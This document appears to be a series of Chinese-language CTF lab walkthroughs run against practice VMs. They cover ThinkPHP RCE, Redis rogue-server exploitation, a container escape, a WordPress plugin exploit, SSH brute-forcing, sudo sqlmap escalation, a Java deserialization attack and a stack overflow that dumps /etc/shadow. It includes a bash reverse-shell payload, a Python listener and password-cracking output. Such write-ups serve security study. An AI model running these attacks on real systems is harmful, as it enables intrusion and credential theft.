靶机扫描

┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.1.39 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT
Nmap scan report for 192.168.1.39
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

开了22 和 80

报错页面发现是ThinkPHP V5.0.5， 直接rce getshell

内网横向

fscan -h 172.19.0.0/24 -np
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0
                                                                                                                                                    
[2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1                                                                                                      
[2025-07-12 14:17:09] [INFO] 开始信息扫描
[2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING)
[2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256
[2025-07-12 14:17:09] [INFO] 开始主机扫描
[2025-07-12 14:17:09] [INFO] 有效端口数量: 233
[2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22
[2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.]                                                                                                                  
[2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80
[2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx
[2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379
[2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store

fscan扫描内网 ,发现了172.19.0.2:6379跑了个redis

传个frp，开个socks代理，尝试连接redis

┌──(root㉿kali)-[~]
└─# proxychains4 -q redis-cli -h 172.19.0.2  -p 6379                                                                                 
172.19.0.2:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:82e99d45f54e2614
redis_mode:standalone
os:Linux 4.19.0-27-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1
run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df
tcp_port:6379
uptime_in_seconds:1231
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7500446
executable:/data/redis-server
config_file:

# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:4100800
blocked_clients:0

# Memory
used_memory:854176
used_memory_human:834.16K
used_memory_rss:12750848
used_memory_rss_human:12.16M
used_memory_peak:4953952
used_memory_peak_human:4.72M
used_memory_peak_perc:17.24%
used_memory_overhead:840974
used_memory_startup:791280
used_memory_dataset:13202
used_memory_dataset_perc:20.99%
allocator_allocated:1424312
allocator_active:1716224
allocator_resident:8458240
total_system_memory:2092433408
total_system_memory_human:1.95G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.20
allocator_frag_bytes:291912
allocator_rss_ratio:4.93
allocator_rss_bytes:6742016
rss_overhead_ratio:1.51
rss_overhead_bytes:4292608
mem_fragmentation_ratio:15.70
mem_fragmentation_bytes:11938672
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1752329680
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:2
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:14801
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:20ebee4cf286daa409471774f86ee700d032f99f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.697228
used_cpu_user:0.911468
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001602

# Cluster
cluster_enabled:0

# Keyspace

redis未授权，尝试各种写马姿势弹shell都不行，和bamuwe交流得知 redis主机不出网

可以将攻击机的端口映射到内网，也可以将内网端口映射出来

web主机上有python3的环境，直接传一个简易的nc上去

import socket
import threading
import sys

def recv_thread(conn):
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                print("\nConnection closed by client.")
                break
            print(data.decode(errors='ignore'), end='', flush=True)
    except Exception as e:
        print(f"\nReceive error: {e}")
    finally:
        conn.close()
        sys.exit(0)

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <listen_port>")
        sys.exit(1)

    listen_port = int(sys.argv[1])

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('0.0.0.0', listen_port))
    server.listen(1)
    print(f"Listening on 0.0.0.0:{listen_port} ...")

    conn, addr = server.accept()
    print(f"Connection from {addr[0]}:{addr[1]} established!")

    t = threading.Thread(target=recv_thread, args=(conn,), daemon=True)
    t.start()

    try:
        while True:
            cmd = sys.stdin.readline()
            if not cmd:
                break
            conn.sendall(cmd.encode())
    except KeyboardInterrupt:
        print("\nUser interrupted.")
    finally:
        conn.close()
        server.close()

if __name__ == "__main__":
    main()

https://github.com/n0b0dyCN/redis-rogue-server

使用这个工具直接一把梭

2025/07/12 10:59:33 CMD: UID=33    PID=760    | ./pspy64 
2025/07/12 10:59:33 CMD: UID=33    PID=704    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=703    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=697    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=693    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=692    | md5sum 
2025/07/12 10:59:33 CMD: UID=33    PID=472    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=471    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=470    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=469    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=465    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=403    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=32     | ./frpc -c frps.ini 
2025/07/12 10:59:33 CMD: UID=33    PID=30     | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=29     | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=28     | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=24     | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=15     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=14     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=9      | nginx: worker process          
2025/07/12 10:59:33 CMD: UID=0     PID=8      | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf) 
2025/07/12 10:59:33 CMD: UID=0     PID=7      | nginx: master process /usr/sbin/nginx -g daemon off; 
2025/07/12 10:59:33 CMD: UID=101   PID=6      | /usr/sbin/mariadbd 
2025/07/12 10:59:33 CMD: UID=0     PID=1      | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf 
2025/07/12 11:00:01 CMD: UID=0     PID=768    | runc init 
2025/07/12 11:00:01 CMD: UID=0     PID=773    | rm -fv /var/www/html/exp.so 

要注意服务器会定时删除so后缀的文件，将exp.so名称成一个没有后缀的文件就行

www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
< python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 172.19.0.2:6379
[info] SERVER 172.19.0.3:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
r
[info] Open reverse shell...
Reverse server address: 172.19.0.3
172.19.0.3
Reverse server port: 5555
5555
[info] Reverse shell payload sent.
[info] Check at 172.19.0.3:5555
[info] Unload module...
   
$ python3 s.py
Usage: s.py <listen_port>
$ python3 s.py 5555
id
Listening on 0.0.0.0:5555 ...
Connection from 172.19.0.2:56334 established!
uid=999(redis) gid=999(redis) groups=999(redis)

成获取redis权限

cat /opt/user.txt
flag{user-4f6311d4cf5776f0316c2f1b6526a653}

提权

根据bamuwe的提示，查看web主机的数据库

www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot
mysql -uroot -proot
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;                                                                                                                                                
+--------------------+                                                                                                                                         
| Database           |                                                                                                                                         
+--------------------+                                                                                                                                         
| hnymwl_com_utf8    |                                                                                                                                         
| information_schema |                                                                                                                                                       
| mysql              |                                                                                                                                                       
| performance_schema |
+--------------------+
4 rows in set (0.000 sec)

MariaDB [(none)]> use hnymwl_com_utf8;
use hnymwl_com_utf8;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [hnymwl_com_utf8]> show tables;
show tables;
+---------------------------+
| Tables_in_hnymwl_com_utf8 |
+---------------------------+
| codepay_order             |
| codepay_user              |
| sdad3135                  |
| wp_allot                  |
| wp_area                   |
| wp_balance                |
| wp_bankcard               |
| wp_bankinfo               |
| wp_banks                  |
| wp_cardinfo               |
| wp_catproduct             |
| wp_conf                   |
| wp_config                 |
| wp_gg                     |
| wp_integral               |
| wp_klinedata              |
| wp_newsclass              |
| wp_newsinfo               |
| wp_opentime               |
| wp_order                  |
| wp_order_log              |
| wp_payment                |
| wp_price_log              |
| wp_productclass           |
| wp_productdata            |
| wp_productinfo            |
| wp_refundlog              |
| wp_risk                   |
| wp_usercode               |
| wp_userinfo               |
| wp_webconfig              |
| wp_wechat                 |
+---------------------------+
32 rows in set (0.001 sec)

MariaDB [hnymwl_com_utf8]> select * from wp_userinfo;
select * from wp_userinfo;
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| uid  | username    | upwd                             | utel        | utime      | agenttype | otype | ustatus | oid     | address | portrait | lastlog    | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname  | logintime  | usermoney | userpoint | minprice |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
|    1 | admin       | 35a6b91de813873ca887f5d9b681d180 |             | 1480061674 |         2 |     3 |       0 | NULL    | NULL    | NULL     |       NULL | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | admin     | NULL       |      0.00 |      NULL |     NULL |
| 5632 | 10005632    | 18aed8d2a11896a6e76180b3d87e64bb | 123456      | 1592404993 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1597391565 | admin       | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | www       | 1597391565 |  11670.00 |      NULL |     NULL |
| 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 |         0 |     0 |       0 | 666     | NULL    | NULL     | 1751965186 | AN          | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | 小可爱    | 1751965186 | 680278.00 |      NULL |     NULL |
| 5635 | 10005635    | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 |         0 |     0 |       0 | dashazi | NULL    | NULL     | 1752205841 | whatcanisay | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | root      | 1752205841 |      0.00 |      NULL |     NULL |
| 5636 | 10005636    | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1752296822 | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | test      | 1752296822 |      0.00 |      NULL |     NULL |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
5 rows in set (0.000 sec)

MariaDB [hnymwl_com_utf8]> 

在wp_userinfo表中发现了一个root的密码，将web代码脱下来审计，查看密码加密方式

public function login()
    {
        $userinfo = Db::name('userinfo');
        //判断是否已经登录
        if (isset($_SESSION['uid'])) {
            $this->redirect('index/index?token='.$this->token);
        }
        
        if(iswechat() && 1==2){
            //微信浏览器 微信登录
            if(cookie('wx_info')){
                $wx_info = cookie('wx_info');

                $data['openid'] = $wx_info['openid'];
                $checkuser = Db::name('userinfo')->where($data)->value('uid');
                //判断是否已经注册
                if($checkuser){  //已经注册直接記錄session
                    $_SESSION['uid'] = $checkuser;
                    //更新登录时间
                    $t_data['logintime'] = $t_data['lastlog'] = time();
                    $t_data['uid'] = $checkuser;
                    $userinfo->update($t_data);
                    $this->redirect('index/index');
                }else{  //未注册 则注册 默认密碼为123456
                    $data['nickname'] = $wx_info['nickname'];
                    $data['utime'] = time();
                    //$data['upwd'] = md5('123456'.$data['utime']);
                    $data['otype'] = 0;
                    $data['ustatus'] = 0;
                    $data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city'];
                    $data['portrait'] = $wx_info['headimgurl'];
                    if(isset($_SESSION['fid']) && $_SESSION['fid']>0){
                        $fid = $_SESSION['fid'];
                        $fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid');
                        if($fid_info){
                            $data['oid'] = $fid;
                        }

                    }
                    //插入数据
                    $ids = $userinfo->insertGetId($data);
                    $newdata['uid'] = $ids;
                    $newdata['username'] = 10000000+$ids;
                    $newids = $userinfo->update($newdata);
                    //清除cookie 为了安全
                    cookie('wx_info', null);
                    //記錄session
                    $_SESSION['uid'] = $ids;
                    //更新登录时间
                    $t_data['logintime'] = $t_data['lastlog'] = time();
                    $t_data['uid'] = $ids;
                    $userinfo->update($t_data);
                    $this->redirect('login/addpwd?token='.$this->token);
                }
            }else{
                $this->redirect('wechat/get_wx_userinfo');
                
            }

        }else{
            //web用戶登录请求
            if(input('post.')){
                $data = input('post.');
                //验证用戶信息
                if(!isset($data['username']) || empty($data['username'])){
                    return WPreturn('请输入用戶名！',-1);
                }
                if(!isset($data['upwd']) || empty($data['upwd'])){
                    return WPreturn('请输入密碼！',-1);
                }
                //查询用戶
                
                $result = $userinfo
                ->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username'])
                        ->field("uid,upwd,username,utel,utime,otype,ustatus")->find();
                //验证用戶
                if(empty($result)){
                    return WPreturn('登录失败,用戶名不存在!',-1);
                }else{
                    if(!in_array($result['otype'], array(0,101))){  //非客户无权登录
                        return WPreturn('您无权登录!',-1);
                    }
                    if($result['upwd'] == md5($data['upwd'].$result['utime'])){
                    
                        if ($result['ustatus']==0)
                        {
                            $_SESSION['uid'] = $result['uid'];
                            //更新登录时间
                            $t_data['logintime'] = $t_data['lastlog'] = time();
                            $t_data['uid'] = $result['uid'];
                            $userinfo->update($t_data);
                            return WPreturn('登录成功!',1);

                        }elseif($result['ustatus']==1){
                            return WPreturn('登录失败,您的账户暂时被冻结!',-1);
                        }else{
                            return WPreturn('登录失败,用戶名不存在!',-1);
                        }
                    
                    }
                    else{
                        return WPreturn('登录失败,密碼错误!',-1);
                    }
                }

                
                
            }
            return $this->fetch();
            
        }

加密密码是 md5(pass+时间戳)

可以写脚本爆破，也可以不写，群里直接提示了 密码是managername字段下的whatcanisay

登录到redis主机的root

cat /proc/self/status |grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

猜测这应该是个特权容器

ls /dev/ | grep sda
sda
sda1
sda2
sda5
mount /dev/sda1 /mnt
cd /mnt
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root 
ls
root.txt
cat root.txt
flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5}

将sda1挂载上，发现这就是主机的目录，成功逃逸

发现是wordpress 随便点几下跳转了http://new.dsz 改个hosts

wordpress的话就走正常流程，wpscan扫用户爆破密码先整上，发现没什么成果

发现用了Social Warfare v3.5.2插件，随便一搜就找到rce https://github.com/hash3liZer/CVE-2019-9978

┌──(root㉿kali)-[~]
└─# cat payload                    
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
                                                                                                              ┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$ 

成功getshell

提权

www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$ 

在opt下有个andeli_cred可执行文件，执行输出一堆类似md5的值，尝试用这些字符串去爆破andeli用户

┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1  ssh://192.168.1.36 -vV -f -t 10 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36   login: andeli   password: 9eeb22195b4eb7a35bcad0f45761eb7b

登录ssh，三板斧，找一下suid，没发现可利用的

看一下sudo -l

andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andeli may run the following commands on New:
    (ALL) NOPASSWD: /usr/bin/sqlmap

可以用root执行sqlmap

andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
        ___
       __H__                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.5.2#stable}                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:51 /2025-07-01/

[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
# 

模拟终端执行

查看/opt/code/test.c 文件

伪随机，跑代码得到三个数

用这三个数进行端口敲门，就会开放8080端口

访问8080， 密码爆破 admin/123457

目录扫描，发现接口/download

对参数进行爆破，爆破出参数为file，可以任意文件读取

读取/proc/self/maps 查看内存

找到/app/javaserver-0.0.1-SNAPSHOT.jar

使用这个接口读取jar

反编译发现反序列化接口

直接打CommonsCollections链子

使用ysoserial生成反弹shell payload

带上cookie发送payload getshell

内网横向

上传frp 搭建socks代理

使用fscan 等工具扫描内网主机

扫描到内网主机172.17.0.2，开起来80和22

查看80端口，是一个关于暴力破解的讲解，在最底下有一个注释内容500-worst-passwords

这是seclists中的一个字典，使用这个字典去爆破root@172.17.0.2 root/mountain

ssh连上去 在/usr/bin中发现可疑文件 userLogin

ida分析

标准的xtea加密

找到key和输出的文件

因为是常量定义的key 和 读取的文件的文件名，这里ida分析将这两值合在了一起

xtea的key为16位，分成4组进行加密

key-for-user-ldz是key ， id_ed25519是读取的文件名

很明显是一个私钥，写脚本解密output.enc

提取出来解密

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 8
#define ROUNDS 64

const char FIXED_KEY_STR[16] = "key-for-user-ldz"; 
const char *INPUT_FILE = "output.enc";          
const char *OUTPUT_FILE = "decrypted.txt";     

void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS;
    for (int i = 0; i < ROUNDS; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0; v[1] = v1;
}

void key_from_fixed_string(uint32_t key[4]) {
    for (int i = 0; i < 4; ++i) {
        key[i] = ((uint32_t)FIXED_KEY_STR[i*4]) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 1] << 8) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 2] << 16) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 3] << 24);
    }
}

void decrypt_file() {
    FILE *fin = fopen(INPUT_FILE, "rb");
    FILE *fout = fopen(OUTPUT_FILE, "wb");
    if (!fin || !fout) {
        perror("文件打开失败");
        exit(1);
    }

    uint32_t key[4];
    key_from_fixed_string(key);

    uint8_t buffer[BLOCK_SIZE];
    size_t read_size;
    while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) {
        uint32_t block[2];
        memcpy(block, buffer, BLOCK_SIZE);
        xtea_decrypt(block, key);
        fwrite(block, 1, BLOCK_SIZE, fout);
    }

    fclose(fin);
    fclose(fout);
    printf("解密完成：%s → %s\n", INPUT_FILE, OUTPUT_FILE);
}

int main() {
    decrypt_file();
    return 0;
}

查看解密完的文件

是个私钥，设置权限600 ，根据解密的key，可以得知是用户ldz的私钥

登录这个用户

提权

localhost:~$ find / -perm -4000 2>/dev/null
/opt/vuln
/bin/bbsuid

查看suid

有个vuln，ida分析一下

让flag=1就能执行secret()函数

这个函数读取/etc/shadow

这里很明显是一个栈溢出覆盖flag的值，进行判断绕过

payload:

localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln
root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20205:0:99999:7:::
chrony:!:20205:0:99999:7:::
ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7:::
nginx:!:20263:0:99999:7:::

成功读取shadow

爆破得到root密码

┌──(root㉿kali)-[~]
└─# john --format=sha512crypt --wordlist=rockyou.txt hash       
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
                                                                                                                                               
┌──(root㉿kali)-[~]
└─# john hash --show                                     
root:yulianateamo:20263:0:::::

1 password hash cracked, 0 left


┌──(root㉿kali)-[~]
└─# ssh root@10.20.73.10                
root@10.20.73.10's password: 

localhost:~# 
localhost:~# 
localhost:~# ls
root.txt
localhost:~# cat root.txt 
flag{98ecb90d5dcef41e1bd18f47697f287a}
localhost:~# 

思路：

64位elf

ida分析

分析这几个函数

init函数初始化了一个table，一看就是rc4加密

